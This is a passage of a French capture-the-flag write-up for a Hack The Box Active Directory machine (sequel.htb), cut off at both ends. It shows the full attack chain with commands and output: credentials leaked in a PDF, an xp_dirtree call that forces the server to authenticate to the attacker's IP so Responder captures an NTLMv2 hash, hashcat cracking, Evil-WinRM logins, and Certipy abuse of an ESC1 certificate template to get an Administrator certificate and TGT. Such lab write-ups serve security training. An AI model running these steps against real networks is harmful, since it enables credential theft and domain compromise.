sequel.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Copying <span class="s2">&#34;\SQL Server Procedures.pdf&#34;</span> to <span class="s2">&#34;SQL Server Procedures.pdf&#34;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> File <span class="s2">&#34;\SQL Server Procedures.pdf&#34;</span> was downloaded to <span class="s2">&#34;SQL Server Procedures.pdf&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="credentials-for-mssql">Credentials for MSSQL </h3><p>Le document &ldquo;<strong>SQL Server Procedures.pdf</strong>&rdquo; est une procedure pour se connecter à une instance de <strong>SQL Server</strong>.</p> <p>Ce document fait mention de plusieurs utilisateurs : Ryan, Tom, brandon.brown.<br> On récupère même des credentials pour se connecter au serveur SQL :</p> <ul> <li>PublicUser : <code>GuestUserCantWrite1</code></li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Bonus </span></span><span class="line"><span class="cl">For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with </span></span><span class="line"><span class="cl">user PublicUser and password GuestUserCantWrite1 . </span></span><span class="line"><span class="cl">Refer to the previous guidelines and make sure to switch the <span class="s2">&#34;Windows Authentication&#34;</span> to <span class="s2">&#34;SQL Server Authentication&#34;</span>. </span></span></code></pre></td></tr></table> </div> </div><h3 id="mssql--xp_dirtree-and-responder">MSSQL : xp_dirtree and responder </h3><p>En utilisant <strong>mssqlclient</strong>, on se connecte au sql server avec l&rsquo;utilisateur récupéré.</p> <p>On peut alors effectuer une requête avec la commande <code>xp_dirtree</code> afin d&rsquo;effectuer une fausse requête pour énumerer un share sur notre ordinateur (IP de l&rsquo;attaquant).<br> Dans le même temps on lance un <strong>responder</strong> qui se met en attente. L&rsquo;idée est la commande est executé de manière authentifier avec l&rsquo;utilisateur <strong>sql_svc</strong>, et le responder peut intercepter ses credentials.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">mssqlclient.py <span class="s2">&#34;DC&#34;</span>/<span class="s2">&#34;PublicUser&#34;</span>:<span class="s2">&#34;GuestUserCantWrite1&#34;</span>@<span class="s2">&#34;10.10.11.202&#34;</span> </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Encryption required, switching to TLS </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ENVCHANGE<span class="o">(</span>DATABASE<span class="o">)</span>: Old Value: master, New Value: master </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ENVCHANGE<span class="o">(</span>LANGUAGE<span class="o">)</span>: Old Value: , New Value: us_english </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ENVCHANGE<span class="o">(</span>PACKETSIZE<span class="o">)</span>: Old Value: 4096, New Value: <span class="m">16192</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> INFO<span class="o">(</span>DC<span class="se">\S</span>QLMOCK<span class="o">)</span>: Line 1: Changed database context to <span class="s1">&#39;master&#39;</span>. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> INFO<span class="o">(</span>DC<span class="se">\S</span>QLMOCK<span class="o">)</span>: Line 1: Changed language setting to us_english. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ACK: Result: <span class="m">1</span> - Microsoft SQL Server <span class="o">(</span><span class="m">150</span> 7208<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SQL <span class="o">(</span>PublicUser guest@master<span class="o">)</span>&gt; xp_dirtree <span class="se">\\</span>10.10.14.10<span class="se">\f</span>ake<span class="se">\f</span>ile </span></span><span class="line"><span class="cl">subdirectory depth file </span></span><span class="line"><span class="cl">------------ ----- ---- </span></span></code></pre></td></tr></table> </div> </div><p>Ici, on observe la reception du hachage du mot de passe de l&rsquo;utilisateur <code>sql_svc</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ responder -I tun0 -w -F </span></span><span class="line"><span class="cl"> __ </span></span><span class="line"><span class="cl"> .----.-----.-----.-----.-----.-----.--<span class="p">|</span> <span class="p">|</span>.-----.----. </span></span><span class="line"><span class="cl"> <span class="p">|</span> _<span class="p">|</span> -__<span class="p">|</span>__ --<span class="p">|</span> _ <span class="p">|</span> _ <span class="p">|</span> <span class="p">|</span> _ <span class="o">||</span> -__<span class="p">|</span> _<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>__<span class="p">|</span> <span class="p">|</span>_____<span class="p">|</span>_____<span class="p">|</span> __<span class="p">|</span>_____<span class="p">|</span>__<span class="p">|</span>__<span class="p">|</span>_____<span class="o">||</span>_____<span class="p">|</span>__<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>__<span class="p">|</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> NBT-NS, LLMNR <span class="p">&amp;</span> MDNS Responder 3.1.5.0 </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Listening <span class="k">for</span> events... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Error starting TCP server on port 53, check permissions or other servers running. </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Client : 10.10.11.202 </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Username : sequel<span class="se">\s</span>ql_svc </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Hash : sql_svc::sequel:1122334455667788:0ED55C287EF37F6AD239ED0D6FE449A0:010100000000000000B9CE454A23DC018C349009419598CF000000000200080044004C005200500001001E00570049004E002D005A004A00320059004300360033004D0035003400480004003400570049004E002D005A004A00320059004300360033004D003500340048002E0044004C00520050002E004C004F00430041004C000300140044004C00520050002E004C004F00430041004C000500140044004C00520050002E004C004F00430041004C000700080000B9CE454A23DC0106000400020000000800300030000000000000000000000000300000051C4546D071DE4532ED8EA78B4BE4B4FB7296E7379A3F3F9319A487E526B2A10A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310030000000000000000000 </span></span></code></pre></td></tr></table> </div> </div><h3 id="hashcat--sql_svc-password">Hashcat : sql_svc password </h3><p>On trouve le mot de passe de <strong>sql_svc</strong> à l&rsquo;aide de hashcat et la liste rockyou.txt.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">5600</span> ./hash.txt ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl">SQL_SVC::sequel:112233.....0000000:REGGIE1234ronnie </span></span></code></pre></td></tr></table> </div> </div><h3 id="errorlogbak--ryancooper-password">ERRORLOG.BAK : Ryan.Cooper password </h3><p>On peut alors se connecter au compte sql_svc avec evilwinrm et obtenir un powershell sur la machine :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ evil-winrm -u <span class="s1">&#39;sql_svc&#39;</span> -p <span class="s1">&#39;REGGIE1234ronnie&#39;</span> -i <span class="s2">&#34;10.10.11.202&#34;</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On trouve le mot de passe de <strong>Ryan.cooper</strong> dans un fichier de logs de SQL Server : <code>NuclearMosquito3</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\S</span>QLServer<span class="se">\L</span>ogs&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\S</span>QLServer<span class="se">\L</span>ogs </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a---- 2/7/2023 8:06 AM <span class="m">27608</span> ERRORLOG.BAK </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\S</span>QLServer<span class="se">\L</span>ogs&gt; download <span class="s2">&#34;C:/SQLServer/Logs/ERRORLOG.BAK&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remember that in docker environment all <span class="nb">local</span> paths should be at /data and it must be mapped correctly as a volume on docker run <span class="nb">command</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Downloading C:/SQLServer/Logs/ERRORLOG.BAK to ERRORLOG.BAK </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">---------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ cat ERRORLOG.BAK <span class="p">|</span> grep -i pass </span></span><span class="line"><span class="cl">2022-11-18 13:43:06.75 spid18s Password policy update was successful. </span></span><span class="line"><span class="cl">2022-11-18 13:43:07.44 Logon Logon failed <span class="k">for</span> user <span class="s1">&#39;sequel.htb\Ryan.Cooper&#39;</span>. Reason: Password did not match that <span class="k">for</span> the login provided. <span class="o">[</span>CLIENT: 127.0.0.1<span class="o">]</span> </span></span><span class="line"><span class="cl">2022-11-18 13:43:07.48 Logon Logon failed <span class="k">for</span> user <span class="s1">&#39;NuclearMosquito3&#39;</span>. Reason: Password did not match that <span class="k">for</span> the login provided. <span class="o">[</span>CLIENT: 127.0.0.1<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ evil-winrm -u <span class="s1">&#39;Ryan.Cooper&#39;</span> -p <span class="s1">&#39;NuclearMosquito3&#39;</span> -i <span class="s2">&#34;10.10.11.202&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\R</span>yan.Cooper<span class="se">\D</span>ocuments&gt; <span class="nb">type</span> <span class="s2">&#34;C:/Users/Ryan.Cooper/Desktop/user.txt&#34;</span> </span></span><span class="line"><span class="cl">d3b6.....cd0e </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation--esc1-template">Privilege Escalation : ESC1 Template </h2><p>When a certificate template allows to specify a subjectAltName, it is possible to request a certificate for another user. It can be used for privileges escalation if the EKU specifies Client Authentication or ANY.</p> <h3 id="enumeration--certipy-find">Enumeration : certipy find </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ certipy find -u <span class="s1">&#39;Ryan.cooper&#39;</span> -p <span class="s1">&#39;NuclearMosquito3&#39;</span> -dc-ip 10.10.11.202 -vulnerable -stdout </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">34</span> certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding certificate authorities </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">1</span> certificate authority </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">12</span> enabled certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;sequel-DC-CA&#39;</span> via CSRA </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Got error <span class="k">while</span> trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;sequel-DC-CA&#39;</span> via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;sequel-DC-CA&#39;</span> via RRP </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got CA configuration <span class="k">for</span> <span class="s1">&#39;sequel-DC-CA&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Enumeration output: </span></span><span class="line"><span class="cl">Certificate Authorities </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> CA Name : sequel-DC-CA </span></span><span class="line"><span class="cl"> DNS Name : dc.sequel.htb </span></span><span class="line"><span class="cl"> Certificate Subject : <span class="nv">CN</span><span class="o">=</span>sequel-DC-CA, <span class="nv">DC</span><span class="o">=</span>sequel, <span class="nv">DC</span><span class="o">=</span>htb </span></span><span class="line"><span class="cl"> Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101 </span></span><span class="line"><span class="cl"> Certificate Validity Start : 2022-11-18 20:58:46+00:00 </span></span><span class="line"><span class="cl"> Certificate Validity End : 2121-11-18 21:08:46+00:00 </span></span><span class="line"><span class="cl"> Web Enrollment : Disabled </span></span><span class="line"><span class="cl"> User Specified SAN : Disabled </span></span><span class="line"><span class="cl"> Request Disposition : Issue </span></span><span class="line"><span class="cl"> Enforce Encryption <span class="k">for</span> Requests : Enabled </span></span><span class="line"><span class="cl"> Permissions </span></span><span class="line"><span class="cl"> Owner : SEQUEL.HTB<span class="se">\A</span>dministrators </span></span><span class="line"><span class="cl"> Access Rights </span></span><span class="line"><span class="cl"> ManageCertificates : SEQUEL.HTB<span class="se">\A</span>dministrators </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> ManageCa : SEQUEL.HTB<span class="se">\A</span>dministrators </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> Enroll : SEQUEL.HTB<span class="se">\A</span>uthenticated Users </span></span><span class="line"><span class="cl">Certificate Templates </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> Template Name : UserAuthentication </span></span><span class="line"><span class="cl"> Display Name : UserAuthentication </span></span><span class="line"><span class="cl"> Certificate Authorities : sequel-DC-CA </span></span><span class="line"><span class="cl"> Enabled : True </span></span><span class="line"><span class="cl"> Client Authentication : True </span></span><span class="line"><span class="cl"> Enrollment Agent : False </span></span><span class="line"><span class="cl"> Any Purpose : False </span></span><span class="line"><span class="cl"> Enrollee Supplies Subject : True </span></span><span class="line"><span class="cl"> Certificate Name Flag : EnrolleeSuppliesSubject </span></span><span class="line"><span class="cl"> Enrollment Flag : PublishToDs </span></span><span class="line"><span class="cl"> IncludeSymmetricAlgorithms </span></span><span class="line"><span class="cl"> Private Key Flag : ExportableKey </span></span><span class="line"><span class="cl"> Extended Key Usage : Client Authentication </span></span><span class="line"><span class="cl"> Secure Email </span></span><span class="line"><span class="cl"> Encrypting File System </span></span><span class="line"><span class="cl"> Requires Manager Approval : False </span></span><span class="line"><span class="cl"> Requires Key Archival : False </span></span><span class="line"><span class="cl"> Authorized Signatures Required : <span class="m">0</span> </span></span><span class="line"><span class="cl"> Validity Period : <span class="m">10</span> years </span></span><span class="line"><span class="cl"> Renewal Period : <span class="m">6</span> weeks </span></span><span class="line"><span class="cl"> Minimum RSA Key Length : <span class="m">2048</span> </span></span><span class="line"><span class="cl"> Permissions </span></span><span class="line"><span class="cl"> Enrollment Permissions </span></span><span class="line"><span class="cl"> Enrollment Rights : SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\D</span>omain Users </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> Object Control Permissions </span></span><span class="line"><span class="cl"> Owner : SEQUEL.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Owner Principals : SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Dacl Principals : SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Property Principals : SEQUEL.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> SEQUEL.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> <span class="o">[</span>!<span class="o">]</span> Vulnerabilities </span></span><span class="line"><span class="cl"> ESC1 : <span class="s1">&#39;SEQUEL.HTB\\Domain Users&#39;</span> can enroll, enrollee supplies subject and template allows client authentication </span></span></code></pre></td></tr></table> </div> </div><h3 id="requesting-a-malicious-certificate">Requesting a Malicious Certificate </h3><p>On demande un certificat pour Administrator à travers le template vulnérable :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ certipy req -username <span class="s2">&#34;Ryan.cooper@sequel.htb&#34;</span> -p <span class="s2">&#34;NuclearMosquito3&#34;</span> -target <span class="s1">&#39;dc.sequel.htb&#39;</span> -ca <span class="s2">&#34;sequel-DC-CA&#34;</span> -template <span class="s2">&#34;UserAuthentication&#34;</span> -upn <span class="s2">&#34;Administrator@sequel.htb&#34;</span> -debug </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;dc.sequel.htb&#39;</span> at <span class="s1">&#39;127.0.0.53&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;SEQUEL.HTB&#39;</span> at <span class="s1">&#39;127.0.0.53&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Generating RSA key </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting certificate via RPC </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to connect to endpoint: ncacn_np:10.10.11.202<span class="o">[</span><span class="se">\p</span>ipe<span class="se">\c</span>ert<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Connected to endpoint: ncacn_np:10.10.11.202<span class="o">[</span><span class="se">\p</span>ipe<span class="se">\c</span>ert<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully requested certificate </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Request ID is <span class="m">17</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got certificate with UPN <span class="s1">&#39;Administrator@sequel.htb&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Certificate has no object SID </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved certificate and private key to <span class="s1">&#39;administrator.pfx&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><p>### Fixing Kerberos Clock Skew (KRB_AP_ERR_SKEW) L’attaque échoue d’abord à cause d’un décalage horaire (KRB_AP_ERR_SKEW).<br> En ajustant l’heure avec faketime et l’heure réelle du DC, le problème est corrigé.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ date </span></span><span class="line"><span class="cl">Fri Sep <span class="m">12</span> 12:03:10 AM CEST <span class="m">2025</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ ntpdate -q 10.10.11.202 </span></span><span class="line"><span class="cl">2025-09-12 08:20:53.85924 <span class="o">(</span>+0200<span class="o">)</span> +28800.935013 +/- 0.010303 10.10.11.202 s1 no-leap </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ certipy auth -pfx administrator.pfx </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using principal: administrator@sequel.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get TGT... </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Got error <span class="k">while</span> trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW<span class="o">(</span>Clock skew too great<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ faketime <span class="s2">&#34;</span><span class="k">$(</span>date +<span class="s1">&#39;%Y-%m-%d&#39;</span><span class="k">)</span><span class="s2"> </span><span class="k">$(</span>net <span class="nb">time</span> -S 10.10.11.202 <span class="p">|</span> awk <span class="s1">&#39;{print $4}&#39;</span><span class="k">)</span><span class="s2">&#34;</span> zsh </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ date </span></span><span class="line"><span class="cl">Fri Sep <span class="m">12</span> 08:03:39 AM CEST <span class="m">2025</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ ntpdate -q 10.10.11.202 </span></span><span class="line"><span class="cl">2025-09-12 08:03:44.141842 <span class="o">(</span>+0200<span class="o">)</span> -0.075273 +/- 0.010154 10.10.11.202 s1 no-leap </span></span></code></pre></td></tr></table> </div> </div><h3 id="getting-a-tgt-as-administrator">Getting a TGT as Administrator </h3><p>Avec le certificat généré, on obtient un <strong>TGT</strong> et le <strong>hash NT</strong> de l’Administrator :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ certipy auth -pfx administrator.pfx </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using principal: administrator@sequel.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get TGT... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got TGT </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved credential cache to <span class="s1">&#39;administrator.ccache&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to retrieve NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator&#39;</span> </span></span><span class="line"><span class="cl"><span 